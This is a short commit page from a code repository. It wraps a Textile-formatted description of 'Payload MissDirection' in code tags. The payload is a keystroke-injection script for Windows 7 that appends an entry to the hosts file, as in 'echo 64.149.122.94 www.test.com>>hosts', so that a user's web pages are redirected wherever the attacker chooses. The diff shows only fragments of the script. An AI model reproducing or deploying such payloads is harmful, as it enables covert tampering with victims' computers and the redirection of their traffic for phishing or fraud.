Updated Payload MissDirection (textile)

This commit is contained in:
Jarrett 2014-06-11 20:50:09 -07:00
parent 0cfdb8a12d
commit 90c109b479
1 changed files with 5 additions and 1 deletions

View File

@ -6,6 +6,8 @@ Target: Windows 7
Payload will edit the hosts file to allow you to redirect web pages where you would like the user to go.
<pre>
<code>
DELAY 2000
ESCAPE
CONTROL ESCAPE
@ -21,4 +23,6 @@ STRING echo 64.149.122.94 www.test.com>>hosts
ENTER
DELAY 400
ALT SPACE
STRING c
STRING c
</code>
</pre>